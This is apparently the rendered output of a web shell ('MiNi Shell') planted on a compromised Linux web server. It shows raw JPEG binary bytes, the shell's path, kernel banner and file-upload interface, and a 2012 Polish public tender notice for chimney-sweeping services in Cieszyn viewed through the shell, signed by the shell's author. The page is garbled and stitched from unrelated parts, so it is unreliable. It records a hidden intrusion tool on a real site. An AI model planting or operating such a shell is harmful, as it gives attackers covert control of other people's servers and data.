JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/135741-N-2012.html

<p class="kh_header"><b>Cieszyn: przedmiotem zamówienia jest wykonanie usług kominiarskich w budynkach mieszkalnych administrowanych przez ADM Nr 1 ( ul. Śrutarska 39 ) i ADM Nr 2 ( ul. Tysiąclecia 9c ) Zakładu Budynków Miejskich w Cieszynie Sp. z o .o.</b><br>
<b>Numer ogłoszenia: 135741 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Budynków Miejskich w Cieszynie Sp. z o.o. , ul. Liburnia 2a, 43-400 Cieszyn, woj. śląskie, tel. 033 8523743, faks 033 8522560.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.cieszyn.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przedmiotem zamówienia jest wykonanie usług kominiarskich w budynkach mieszkalnych administrowanych przez ADM Nr 1 ( ul. Śrutarska 39 ) i ADM Nr 2 ( ul. Tysiąclecia 9c ) Zakładu Budynków Miejskich w Cieszynie Sp. z o .o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonanie usług kominiarskich, a w szczególności : 1/ czyszczenia przewodów kominowych, 2/ przeprowadzanie okresowych kontroli stanu technicznego przewodów kominowych, 3/ opiniowanie urządzeń grzewczo - kominowych, 4/ kontrola stanu technicznego przewodów kominowych, 5/ sprawdzenie urządzeń grzewczo - kominowych pod względem bezpieczeństwa przeciwpożarowego z uwzględnieniem odległości od łatwo palnych elementów konstrukcji budynku, 6/ sprawdzenie pod względem bezpieczeństwa użytkowania urządzeń pomocniczych : ławy kominiarskie, drabiny, włazy dachowe-świetliki w budynkach mieszkalnych administrowanych przez ADM Nr 1 ( ul. Śrutarska 39 ) i ADM Nr 2 ( ul. Tysiąclecia 9c ) Zakładu Budynków Miejskich w Cieszynie Sp. z o .o.. I. Wykonywanie następujących usług kominiarskich : 1. Czyszczenie przewodów kominowych od palenisk opalanych paliwem stałym wraz z usuwaniem sadzy, ewentualnych zagruzowań, gniazd itp. celem jego udrożnienia oraz wywozem odpadów na składowiska odpadów. Prace należy wykonać 4 razy w roku w kwartalnych odstępach w terminach do : a / 15 września, b / 15 grudnia, c / 15 marca, d / 15 czerwca. Ponadto w ramach w/w prac w przypadku uszkodzenia drzwiczek wyczystkowych przez kontrolującego należy wykonać ich naprawę bądź wymianę. 2. Czyszczenie przewodów kominowych od palenisk opalanych paliwem płynnym i gazowym  wraz z  usuwaniem  ewentualnych zagruzowań, gniazd itp. celem jego udrożnienia oraz wywozem odpadów na składowiska odpadów. Prace należy wykonać 2 razy w roku w półrocznych odstępach w terminach do : a / 15 września, b / 15 marca. Ponadto w ramach w/w prac w przypadku niedrożności kratki wentylacyjnej bądź zaklejenia przez Najemcę lub konieczności wymiany należy ją udrożnić bądź wymienić. 3. Czyszczenie przewodów kominowych wentylacyjnych wraz z  usuwaniem  ewentualnych zagruzowań, gniazd itp. celem jego udrożnienia oraz wywozem odpadów na składowiska odpadów. Prace należy wykonać 2 razy w roku w półrocznych odstępach w terminach do : a / 15 września, b / 15 marca. W ramach w/w prac w przypadku niedrożności kratki wentylacyjnej bądź zaklejenia przez Najemcę lub konieczności wymiany Wykonawca zobowiązany jest do jej udrożnienia bądź wymiany. Ponadto Wykonawca dokonuje demontażu żaluzji, zaklejeń kratek wentylacyjnych co umożliwi mu dokonanie kontroli przewodów  w sposób prawidłowy. 
4. Przeprowadzanie okresowych kontroli stanu technicznego przewodów kominowych 1 raz w roku zgodnie z wymogami art. 62 Prawa budowlanego w terminie do 30 czerwca i niezwłoczne sporządzenie protokołów pokontrolnych /według druku - w załączeniu/, wraz z wykazem występujących w przewodach kominowych elementów azbestowych i dostarczenie ich zamawiającemu w nieprzekraczalnym terminie do 31 lipca (komplet dla wszystkich budynków). Protokoły z usterkami - nieprawidłowości (opisane poniżej) powinny być przedłożone Zamawiającemu niezwłocznie po stwierdzeniu usterki. Protokół pokontrolny /w załączeniu/ powinien zawierać ocenę-charakterystykę stanu technicznego przewodów kominowych oraz zastosowanego materiału. Stan techniczny powinien być opisany w każdym detalu technicznym, który ma istotne znaczenie dla pracy przewodów wraz ze stwierdzeniem czy przewód oraz urządzenia nadają się do dalszej eksploatacji. Do wykazanej w protokole usterki-nieprawidłowości /nieszczelności, złego funkcjonowania przewodu/ należy podać zalecenia co do sposobu jej usunięcia czy naprawy itp. Ponadto w protokole należy uwzględnić sprawdzenie działania wentylacji grawitacyjnej pod kątem wymiany powietrza w mieszkaniu przy aktualnym sposobie jego użytkowania. 5. W przypadku stwierdzenia nieprawidłowości podczas kontroli Wykonawca ma obowiązek wypełnić stosowny Protokół-Nieprawidłowości (w załączeniu) z podaniem rodzaju usterki oraz sposobu jej usunięcia. Protokół-Nieprawidłowości podpisany przez Najemcę oraz Wykonawcę należy niezwłocznie przedłożyć Zamawiającemu. Protokół-Nieprawidłowości winien być sporządzony w dwóch egzemplarzach, po jednym dla Najemcy i dla Zamawiającego jako załącznik do protokołu głównego. 6. Kontrolujący ma prawo i obowiązek: odciąć dopływ gazu i poinformować o tym fakcie Zamawiającego; poinformować najemcę o stopniu stwierdzonego zagrożenia, zakazie użytkowania zagrożonych instalacji/ urządzeń i uzyskać podpis użytkownika o przyjęciu do wiadomości; podjąć inne czynności możliwe do natychmiastowego wykonania (np. przewietrzenie lokalu itp). 7. Bieżące utrzymywanie należytego stanu przewodów kominowych wykonywanych w ramach w/w punktów  1, 2,  3, 4, tj. czyszczenia i kontroli przewodów kominowych, tj. czynności kominiarskie (od pkt. I.1-5) powinny zostać wykonywane w oparciu o zestawienie przewodów kominowych administrowanych budynków, które sporządza na bieżąco Zamawiający. 8. W razie konieczności Zamawiający zleci dodatkowo: inwentaryzację przewodów kominowych, wyznaczenie przewodu kominowego, dodatkową kontrolę i odbiór przewodów kominowych, sprawdzenie prawidłowości podłączeń urządzeń do przewodów kominowych itp. 9.Rozliczenie czynności dodatkowych nastąpi na podstawie kosztorysów powykonawczych opartych o protokoły końcowego odbioru robót. 10. Wykonawca będzie świadczył czynności wymienione w pkt. 8 - codziennie, w tym, w razie konieczności, również w dni świąteczne i wolne od pracy : a) w zakresie objętym przedmiotem zamówienia Wykonawca zobowiązuje się do skutecznego usuwania nieprawidłowości o każdej porze dnia i nocy, b) Wykonawca zobowiązany jest do usunięcia nieprawidłowości w terminie 24 godzin od zgłoszenia oraz do wykonania robót zleconych przez ADM, w ustalonym w zleceniu terminie, przy  czym celem zabezpieczenia skutków  nieprawidłowości, działania należy podjąć do 15 minut od momentu przyjęcia zgłoszenia, a zabezpieczenie winno nastąpić w czasie nie dłuższym niż 3 godziny od zgłoszenia prze Inspektora ADM.
11. W ramach pełnienia całodobowego dyżuru i usług pogotowia, Wykonawca zapewnia  stacjonarny telefon              z numerem kierunkowym 33, na który będą mogły być zgłaszane nieprawidłowości i usterki kominiarskie                   w trakcie realizacji niniejszej umowy. 12. Przed przystąpieniem do wykonywania usług kominiarskich opisanych w pkt. 1, 2, 3, 4, 8 Wykonujący jest zobowiązany umieścić na tablicach znajdujących się w budynkach z tygodniowym wyprzedzeniem ogłoszenia, które otrzyma od Zamawiającego. 13. Za szkody powstałe w czasie wykonywania usług kominiarskich, a wynikające z niefachowego lub niedbałego wykonywania usługi, odpowiada Wykonawca. 14. Po zakończeniu pracy wykonujący usługi kominiarz powinien upewnić się, że pozostawia obiekt w stanie technicznym niezagrażającym jego użytkownikom. Kontrola stanu obiektu polega na sprawdzeniu, czy po wykonaniu usługi przewody kominowe funkcjonują prawidłowo. 15. Wszystkie czynności kominiarskie powinny być wykonywane zgodnie z obowiązującymi zasadami rzemiosła kominiarskiego, przepisami BHP oraz przepisami pokrewnymi. Prace szczególnie niebezpiecznie i na wysokościach powinny być wykonywane zespołowo. Kominiarz ma prawo odmówić wykonania usługi w przypadku, gdy istnieje realne zagrożenie dla jego zdrowia lub życia. O występujących zagrożeniach Zamawiający powinien  zostać poinformowany niezwłocznie. II. Zakres administrowanych budynków ADM Nr 1 i ADM Nr 2 : Usługi określone w I rozdziale wykonywane w budynkach zarządzanych przez ZBM określone zostały w załącznikach do specyfikacji dla następującej ilości przewodów : ADM Nr 1: a/ budynki komunalne : - 577 przewodów od palenisk opalanych paliwem stałym, w tym 9 przewodów w lokalach użytkowych, - 379 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 27 przewody w lokalach użytkowych, - 924 przewody wentylacyjne, w tym 118 przewody w lokalach użytkowych, b/ Wspólnota Mieszkaniowa Garncarska 3 : - 4 przewody od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 10 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 2 przewody w lokalach użytkowych, - 18 przewodów wentylacyjnych, w tym 3 przewody w lokalach użytkowych, c/ Wspólnota Mieszkaniowa Głęboka 19 : - 21 przewodów od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 5 przewodów od palenisk opalanych paliwem płynnym i gazowym, brak przewodów w lokalach użytkowych, - 6 przewodów wentylacyjnych, brak przewodów w lokalach użytkowych, d/ Wspólnota Mieszkaniowa Górny Rynek 8 : - 4 przewody od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 4 przewody od palenisk opalanych paliwem płynnym i gazowym, w tym 1 przewód w lokalach użytkowych, - 7 przewodów wentylacyjnych, w tym 1 przewód w lokalach użytkowych, e/ Wspólnota Mieszkaniowa Nowe Miasto 10 : - 8 przewodów od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 4 przewody od palenisk opalanych paliwem płynnym i gazowym, w tym 1 przewód w lokalach użytkowych, - 9 przewodów wentylacyjnych, w tym 1 przewód w lokalach użytkowych, f/ Wspólnota Mieszkaniowa Przykopa 16a : - 10 przewodów od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 12 przewodów od palenisk opalanych paliwem płynnym i gazowym, brak przewodów w lokalach użytkowych, - 15 przewodów wentylacyjnych, brak przewodów w lokalach użytkowych, g/ Wspólnota Mieszkaniowa Górny Rynek 1 : - 11 przewodów od palenisk opalanych paliwem płynnym i gazowym, brak przewodów  w lokalach użytkowych, - 19 przewodów wentylacyjnych, w tym 6 przewodów w lokalach użytkowych, h/ Wspólnota Mieszkaniowa Górny Rynek 12, - 4 przewody od palenisk opalanych paliwem stałym, w tym 1 przewód w lokalach użytkowych, - 5 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 2 przewodów  w lokalach użytkowych,                           - 12 przewodów wentylacyjnych, w tym 1 przewód w lokalach użytkowych, i/ Wspólnota Mieszkaniowa Fredry 5
: - 1 przewód od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 2 przewody od palenisk opalanych paliwem płynnym i gazowym, brak przewodów w lokalach użytkowych, - 3 przewody wentylacyjne, w tym 1 przewód w lokalach użytkowych, j/ Wspólnota Mieszkaniowa Sejmowa 1 : - 22 przewody od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 15 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 1 przewód w lokalach użytkowych, - 28 przewodów wentylacyjnych, w tym 2 przewody w lokalach użytkowych, k/ Wspólnota Mieszkaniowa Stary Targ 9 : - 9 przewodów od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 5 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 1 przewód w lokalach użytkowych, - 8 przewodów wentylacyjnych, w tym 2 przewody w lokalach użytkowych. 2. ADM Nr 2 : a/ budynki komunalne : - 259 przewodów od palenisk opalanych paliwem stałym, w tym 4 przewody w lokalach użytkowych, - 193 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 6 przewody w lokalach użytkowych, - 1050 przewodów wentylacyjnych, w tym 42 przewodów w lokalach użytkowych, b/ Wspólnota Mieszkaniowa Katowicka 71 : - 5 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 1 przewód w lokalach użytkowych, - 10 przewodów wentylacyjnych, w tym 2 przewody w lokalach użytkowych, c/ Wspólnota Mieszkaniowa Paderewskiego 7 : - 1 przewód od palenisk opalanych paliwem stałym, brak przewodów w lokalach użytkowych, - 6 przewodów od palenisk opalanych paliwem płynnym i gazowym, brak przewodów w lokalach użytkowych, - 30 przewodów wentylacyjnych, brak przewodów w lokalach użytkowych, d/ Wspólnota Mieszkaniowa Pl. Poniatowskiego 9 : - 25 przewodów od palenisk opalanych paliwem płynnym i gazowym, brak przewodów w lokalach użytkowych,  - 43 przewody wentylacyjne, brak przewodów w lokalach użytkowych, e/ Wspólnota Mieszkaniowa Śniegonia 2 : - 24 przewodów wentylacyjnych, brak przewodów w lokalach użytkowych, f/ Wspólnota Mieszkaniowa Śniegonia 4 : - 25 przewodów wentylacyjnych, w tym 1 przewód w lokalach użytkowych, g/ Wspólnota Mieszkaniowa Strzelców Podhalańskich 7 : - 37 przewodów wentylacyjnych, w tym 1 przewód w lokalu użytkowym, h/ Wspólnota Mieszkaniowa Trzanowskiego 3 : - 13 przewodów wentylacyjnych, w tym 1 przewód w lokalach użytkowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Wypełniony i podpisany druk Oferta - załącznik nr 1, 2/ Wykaz personelu technicznego przewidzianego do realizacji zadania - załącznik nr 4, 3/ Kopia/e dyplomu mistrza kominiarskiego - załącznik nr 5, 4/ Dokument potwierdzający ubezpieczenie Firmy od odpowiedzialności cywilnej  - załącznik nr 6, 5/ Parafowany wzór umowy - załączniki nr 7,  7a, 6/ Oświadczenie o odpadach - załącznik nr 8.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian wysokości cen stosowanych w umowie w przypadku wejścia w życie nowych przepisów w zakresie podatku VAT - o wartość wprowadzonych zmian. Nowe ceny będą  obowiązywać z dniem wejścia w życie zmiany stawek podatku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbm.cieszyn.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Budynków miejskich w Cieszynie Sp. z o. o., ul. Liburnia 2a, 43-400 Cieszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2012 godzina 10:00, miejsce: Zakład Budynków miejskich w Cieszynie Sp. z o. o., ul. Liburnia 2a, 43-400 Cieszyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dla budynków administrowanych przez  ADM Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ADM Nr 1: a/ budynki komunalne : - 577 przewodów od palenisk opalanych paliwem stałym, w tym 9 przewodów w lokalach użytkowych, - 379 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 27 przewody w lokalach użytkowych, - 924 przewody wentylacyjne, w tym 118 przewody w lokalach użytkowych. Wspólnoty - ADM Nr 1 : 83 przewodów od palenisk opalanych paliwem stałym, w tym 1 przewód w lokalach użytkowych, 73 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 9 przewodów w lokalach użytkowych, 125 przewody wentylacyjne, w tym 17 przewody w lokalach użytkowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dla budynków administrowanych przez  ADM Nr  2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ADM Nr 2 : a/ budynki komunalne : - 259 przewodów od palenisk opalanych paliwem stałym, w tym 4 przewody w lokalach użytkowych, - 193 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 6 przewodów w lokalach użytkowych, - 1050 przewodów wentylacyjnych, w tym 42 przewody w lokalach użytkowych Wspólnoty - ADM Nr 2 : 1 przewód od palenisk opalanych paliwem stałym, 36 przewodów od palenisk opalanych paliwem płynnym i gazowym, w tym 1 przewód w lokalach użytkowych, 182 przewodów wentylacyjnych, w tym 5 przewodów w lokalach użytkowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com